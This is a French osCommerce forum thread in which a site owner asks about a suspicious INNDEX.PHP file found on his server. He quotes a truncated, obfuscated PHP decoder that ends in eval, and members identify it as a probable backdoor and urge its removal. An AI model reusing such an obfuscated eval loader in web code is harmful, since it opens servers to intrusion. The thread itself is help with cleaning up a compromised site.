Bienvenue invité ( Connexion | Inscription )
![]() ![]() |
11 May 2012, 13:33
|
|
|
Ceinture blanche OSC Groupe : Membres Messages : 16 Inscrit : 6-January 08 Lieu : fontainebleau Membre no 20292 |
Bonjour à tous,
je viens de découvrir sur mon serveur une page INNDEX.PHP tres tres tres bizard , voici le code de la page : Code <?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,| BLA BLA BLA se{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?> merci d'avance pour votre soutiens et votre aide. Ce message a été modifié par cebb - 11 May 2012, 13:44. -------------------- Cebb
Contrib installé : send html mail - cross selling - scroll whats news & specials - seo - header tags - crimages - tnt - colissimo - discount coupons - google map review - SEO URL - xsell product - whats new box scrolling - osCid Fix - |
|
|
11 May 2012, 13:42
|
|
![]() Ceinture verte OSC Groupe : Membres Messages : 708 Inscrit : 30-May 06 Lieu : Vichy (03) Membre no 10583 |
Bonjour,
1) ce n'est pas la peine de copier tout ce code, çà va inspirer des personnes qui s'ennuient 2) cette section du forum a plusieurs fils du même type, tu y trouvera des solutions 3) j'espère que tu avais appliqué les différents conseils de base pour protéger ton site ? Sinon çà va recommencer plus vite que tu ne pourras retirer le ou les codes malicieux ... -------------------- Config : Osc 2.2 très fortement modifié ... entièrement refait en mai 2012 (passage en UTF-8 et Php 5.3). Le passage à la 2.3 demanderait trop de travail mais je la teste en local ...
Contribs installées : down_for_maintenance_v 2.3 | Estimated Shipping v1.5 | imprint_1_3_5 | low_stock_report_v2.04 | visible_countries_1.2b | Products Tabs | shoppingCart_cleanup_v1.01.0 | + bidouilles persos pas très OsCommerce (erreurs de jeunesse) En local j'utilise UwAmp, que du bonheur ... |
|
|
11 May 2012, 13:45
|
|
|
Ceinture blanche OSC Groupe : Membres Messages : 16 Inscrit : 6-January 08 Lieu : fontainebleau Membre no 20292 |
yes en effet j'ai pas pensé à ca .
oui le site est bien protégé normalement . mais la je beug.. ca a quel incidence a votre avis ?? Ce message a été modifié par cebb - 11 May 2012, 13:46. -------------------- Cebb
Contrib installé : send html mail - cross selling - scroll whats news & specials - seo - header tags - crimages - tnt - colissimo - discount coupons - google map review - SEO URL - xsell product - whats new box scrolling - osCid Fix - |
|
|
7 Jun 2012, 18:01
|
|
![]() 5eme dan OSC Groupe : Administrateur Messages : 9109 Inscrit : 4-March 03 Lieu : Auray Membre no 927 |
Bonjour, Bonbec t'a déjà répondu, dans ce forum les causes, risques et solutions ont déjà été évoqués.
Code à virer d'urgence, cela contient généralement une backdoor (que le pirate récupère sur son site) et/ou un script de duplication pour pourrir le reste de ton site. -------------------- Tout d'abord :
- Ni Hotline ni Service Après Vente, ces forums sont un lieu d'échange. BIEN POSER SA QUESTION (généralités)Les "Informations Importantes" que vous devez ABSOLUMENT avoir lues : Règlement, Bien poser sa question dans ces forums et Bien utiliser les Forums. Les raccourcis pour gagner du temps : la FAQ, les PDF de la Doc (MS2-fr): PDF-V1 et PDF-V2, le moteur de Recherche sur les forums , la Liste des Contributions de Corbin. ----------------------------- Quelques sites de référence --------------------------- PHP: Le site du Zéro et PHP Débutant avec la DOC en français -- HTML: Self HTML - WebProgrammation -- CSS: OpenWeb - AlsaCréations - CSS/Edge -- Autres ressources: - XajaX - highslide js Les bons outils : EasyPHP - WAMP-5 - - Notepad++ - Firefox et son extension WebDeveloperLe gène idéal c'est le gène original. Le génie des halles est un Génie des Alpages qui tente d'être à la page. (Merci f'murrr pour les cours de philosophie de chien) |
|
|
8 Jul 2012, 17:09
|
|
|
Ceinture jaune+ OSC Groupe : Membres Messages : 83 Inscrit : 7-November 09 Lieu : PARIS Membre no 26487 |
Bonjour,
Ma question consistait à savoir comment detectez-vous les nouvelles pages/codes ajoutées dans votre son site, mais veuillez ne pas considérer ce post car j'ai preferé créer un autre sujet à part. Désolé. lien du sujet, au cas où ça intéresserait quelqu'un : http://www.oscommerce-fr.info/forum/index....showtopic=70061 Ce message a été modifié par ngmsky - 8 Jul 2012, 19:20. -------------------- Oscom V 2.3.1 - Easyphp 2.10
10000000 merciS à l'équipe anglophone et francophone pour ce beau travail ! - Ta parole et ta pensée peuvent changer le monde. Alors émets tjrs les bonnes. - Tu es un être unique car Dieu ne fait pas de photocopie :-) - Tu es un être rare. Or tout cequi est rare a de la valeur ! Alors réjouis-toi de ceque tu es, et restes comme tu es :-). Accepte "positivement" d'être différent(e) des autres et ne t'orgueillis pas de ce que tu penses avoir de plus que les autres. - Tes pensées et tes parôles construisent ton avenir. Alors si tu penses et tu parles tjrs du bien (de toi et des autres), tu seras bien (eux aussi, grâce à toi). - Les mains inactives appellent la pauvreté. - Science sans conscience n'est que ruine de l'âme. - L'Amour "véritable" et "inconditionnel" est l'unique solution aux multiples probleme du monde (violence, injustice, dictature, pauvreté, etc). |
|
|
![]() ![]() |
|
Version bas débit | Nous sommes le : 22nd May 2013 - 23:55 |
| Ce site est déclaré auprès de la commision Nationale de l'Informatique et des Libertés (déclaration n°: 1043896) |